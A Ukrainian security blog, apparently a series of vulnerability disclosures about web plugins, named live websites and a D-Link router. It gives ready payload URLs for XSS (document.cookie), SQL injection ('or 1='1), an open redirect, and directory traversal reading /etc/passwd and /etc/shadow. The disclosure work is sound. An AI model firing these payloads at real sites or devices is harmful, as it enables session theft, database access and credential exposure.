Websecurity - Веб безпека

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron та багатьох інших портах WP-Cumulus для різних движків. Така ж уразливість є і в версіях даного плагіна для MODx CMS, XOOPS, uCoz, Magento та DSP CMS, що використовують tagcloud.swf розроблений автором WP-Cumulus.

Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах. Автори цих плагінів, як і тих плагінів, про які я писав раніше, так і не спромоглися виправити дану XSS уразливість з листопада 2009 року, коли я оприлюднив уразливості в WP-Cumulus для WordPress, повідомив про них авторові й він маже повністю їх виправив. Тому доводиться нагадувати кожному з цих розробників окремо.

Восени, 02.09.2011, 09.11.2011 та 18.11.2011, я знайшов Cross-Site Scripting уразливості в Tagcloud для MODx CMS, Сumulus для XOOPS, uCoz-Cumulus для uCoz, Cumulus Tagcloud для Magento та Cumulus для DSP CMS. Деякі з цих плагінів уразливі до однієї, а деяки до двох XSS - як до першої дірки в WP-Cumulus, що я оприлюднив в 2009 році, так і до другої дірки, що я оприлюднив в 2011 році.

XSS:

Tagcloud для MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Сumulus для XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus для uCoz:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Про дірку в якому, на прикладі сайта www.umvspz.gov.ua, я вже згадував торік в себе в новинах та оприлюднив на vs-db.info.

Cumulus Tagcloud для Magento:

http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml
http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Через параметри mode та xmlpath.

Сumulus для DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії Tagcloud для MODx CMS, Сumulus для XOOPS 1.0, який також входить в ExtendedPackRU для XOOPS. Уразливі всі версії uCoz-Cumulus для uCoz, всі версії Cumulus Tagcloud для Magento та всі версії Сumulus для DSP CMS.

В даній добірці уразливості в веб додатках:

• HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code (деталі)
• Precision (products.php?cat_id) Remote SQL injection Vulnerability (деталі)
• Lava (news_item.php?id) (album.php?id) (basket.php?baction) Remote SQL injection Vulnerability (деталі)
• HP Directories Support for ProLiant Management Processors for Integrated Lights-Out iLO2 and iLO3, Unauthorized Access (деталі)
• SQL injection vulnerabilities in Support Incident Tracker (деталі)
• Cross-Site Scripting in Koha Library Software (деталі)
• Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2 (деталі)
• Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities (деталі)
• JC URLshrink 1.3.1 Remote Code Execution Vulnerability (деталі)
• phpBB Module Forum picture and META tags 1.7 File Include Vulnerability (деталі)

У грудні, 10.12.2011, я знайшов Cross-Site Scripting та Brute Force уразливості на http://it-consulting.incom.ua - сайті секюріті компанії Інком. Тоді я звернув увагу, що у Інкома окрім головного сайта на Джумлі-дирумлі є ще багато інших сайтів (на піддоменах) на різних версіях Джумли (1.0.x та 1.5.x), які мають ті самі дірки. Тому виправляти дані уразливості їм потрібно на всіх своїх сайтах.

Після мого повідомлення адміністраціі сайта стосовно дірок на основному сайті, вони також повинні були зрозуміти, що вони відносяться до всіх їхніх сайтів на Joomla (XSS до версій 1.0.х, а BF до всіх версій).

XSS (для Mozilla та Firefox):

• alert(document.cookie)
• цікавий

Brute Force:

http://it-consulting.incom.ua/administrator/

Дані уразливості досі не виправлені.

18.05.2009

У вересні, 17.09.2008, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://intv-inter.net. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

23.12.2011

SQL Injection:

http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='%20or%201='1
http://intv-inter.net/tv/programm/?id=7429146&act='%20or%201='1&channel=1plus1
http://intv-inter.net/radio/ch/?id=-1'%20or%201='1
http://intv-inter.net/tv/channel/intv/?id=-1%20or%201=1

XSS (IE):

http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='style='xss:expression(alert(document.cookie))
http://intv-inter.net/tv/programm/?id=7429146&act='style='xss:expression(alert(document.cookie))'&channel=1plus1
http://intv-inter.net/tv/programm/?id='style='xss:expression(alert(document.cookie))'&act=tvp&channel=1plus1

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Featurific For WordPress, Enable Latex та Meenews. Для котрих з’явилися експлоіти. Featurific For WordPress - це плагін, що являє собою інтерфейс до Featurific Free, Enable Latex - це плагін для включення LaTeX формул в записи, Meenews - це плагін для створення розсилок та управління списками підписчиків.

• Wordpress featurific-for-wordpress plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress enable-latex plugin Remote File Include Vulnerabilities (деталі)
• Wordpress meenews 5.1 plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Trend Micro Control Manager CasLogDirectInsertHandler.cs Remote Code Execution Vulnerability (деталі)
• Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability (деталі)
• Funnel Web (items.php?&cat_id) Remote SQL injection Vulnerability (деталі)
• pango 1.0 security update (деталі)
• Funnel Web (directory.php?cid) Remote SQL injection Vulnerability (деталі)
• Funnel Web (selected_product.php?t) Remote SQL injection Vulnerability (деталі)
• HP StorageWorks P4000 Virtual SAN Appliance, Execution of Arbitrary Code (деталі)
• iPhotoAlbum v1.1 (header.php) Remote File Include Vulnerability (деталі)
• Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vulnerability (деталі)
• DrakeCMS multiple vulerabilities (деталі)

У листопаді, 28.11.2008, я знайшов Cross-Site Scripting та Redirector уразливості на сайті http://img.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на translate.meta.ua.

XSS (Strictly social XSS):

• alert(document.cookie)

Redirector (URL Redirector Abuse):

http://img.meta.ua/mclick.asp?go=http://websecurity.com.ua

Про цей редиректор я вже писав в 2009 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у листопаді 2008 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

У грудні, 10.12.2011, я знайшов Certificate Spoofing уразливість в браузері Google Chrome для Android. Яку я виявив на своєму планшеті з Android 2.3.3. Про що вже сповістив розробників.

Можна викрадати сертифікати від інших сайтів через iframe. Тому я назвав атаку Certificate Stealing. Причому це можна робити не тільки для https, але й для http сайтів. Як видно з моїх скріншотів, http сайт (мій) отримав сертифікат від https сайта (Google).

PoC скріншоти:

Google Chrome for Android-1.jpg
Google Chrome for Android-2.jpg
Google Chrome for Android-3.jpg
Google Chrome for Android-4.jpg
Google Chrome for Android-5.jpg

№1 - Відкрити веб сайт з iframe, що вказує на інший сайт.
№2 - Вибрати Page info в контекстному меню.
№3 - В вікні буде кнопка “View certificate”, якої там бути не повинно, тому що це http сайт.
№4, №5 - Поточний сайт має валідний сертифікат іншого сайта.

Уразливі Google Chrome для Android 2.3.3 та попередні версії (та потенційно наступні версії).

В даній добірці уразливості в веб додатках:

• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information (деталі)
• Symantec Web Gateway forget.php SQL Injection Vulnerability (деталі)
• phpMyAdmin 3.x Multiple Remote Code Executions (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)
• phpMyAdmin 3.x preg_replace RCE POC (деталі)
• Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss) (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS) (деталі)
• Chyrp input sanitization errors (деталі)
• mapserver security update (деталі)
• PHP-Barcode 0.3pl1 Remote Code Execution (деталі)

Продовжуючи тему уразливостей в D-Link DSL-500T, розповім вам про нові уразливості в даному роутері. На цьому тижні я виявив численні Cross-Site Request Forgery, Directory Traversal та Authentication Bypass уразливості в ADSL модемі D-Link DSL-500T ADSL Router. Це п’ятий advisory з серії записів про уразливості в продуктах D-Link. Попередні були про уразливості в DSL-500T ADSL Router та DAP 1150.

Уразлива версія D-Link DSL-500T, Firmware V1.00B02T02.RU.20050223. Дана модель з іншими прошивками також вразлива, а також можуть бути вразливими інші моделі роутерів від D-Link.

CSRF:

Весь функціонал адмінки роутера має CSRF уразливості. Наприклад, наступний CSRF-запит дозволяє змінити логін і пароль адміністратора.

D-Link DSL-500T CSRF.html

Всі інші функції в панелі адміністратора також уразливості до CSRF. А якщо використати XSS і DT, то можна буде віддалено зчитувати довільні файли з роутера.

Directory Traversal:

В 2006 році в інших моделях роутерів D-Link була знайдена DT уразливість (CVE-2006-2337). Яка також є в цій моделі, як я перевірив (але на відміну від опису DT в інших моделях, в моїй моделі необхідна аутентифікація).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Можна зчитувати довільні файли роутера. Але працює дана уразливість тільки після аутентифікації.

Authentication Bypass:

В 2005 році в інших моделях роутерів D-Link була знайдена AB уразливість (CVE-2005-1680). Яка також є в цій моделі, як я перевірив.

Можна без аутентифікації посилати команди додатку firmwarecfg. Що дозволить, наприклад, отримати файл конфігурації з логіном і паролем адміністратора. Для отримання доступу до адмінки.